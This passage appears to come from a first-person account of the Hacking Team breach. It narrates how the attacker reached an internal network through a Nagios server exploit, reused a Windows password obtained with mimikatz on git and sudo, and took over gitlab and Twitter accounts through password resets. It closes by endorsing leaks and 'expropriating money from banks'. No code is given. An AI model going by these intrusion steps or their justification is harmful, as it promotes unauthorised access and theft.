    Inside Christian Pozzi's encrypted volume, there was a text file with many passwords [1]. One of them was for a Fully Automated Nagios server, which had access to the sviluppo network to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (it is an unauthenticated exploit, but it requires a user to have logged in, for which I used the password from the text file).

    Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had his Windows password thanks to mimikatz. I tried it with the git server and it worked. I tried sudo and it worked. For the gitlab server and their Twitter account, I used the "forgot my password" function and my access to the mail server to reset the password.

    Hacking guides usually end with a warning: this information is for educational purposes only, be an ethical hacker, do not attack computers without permission, blah blah blah. I will say the same, but with a more rebellious concept of "ethical" hacking. It would be ethical hacking to leak documents, expropriate money from banks, and protect the computers of ordinary people. However, most people who call themselves "ethical hackers" work only to protect those who pay their consulting fee, who are often the ones that most deserve to be hacked.

    At Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see Vincenzetti, his company, and his cronies in the police and the government as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists.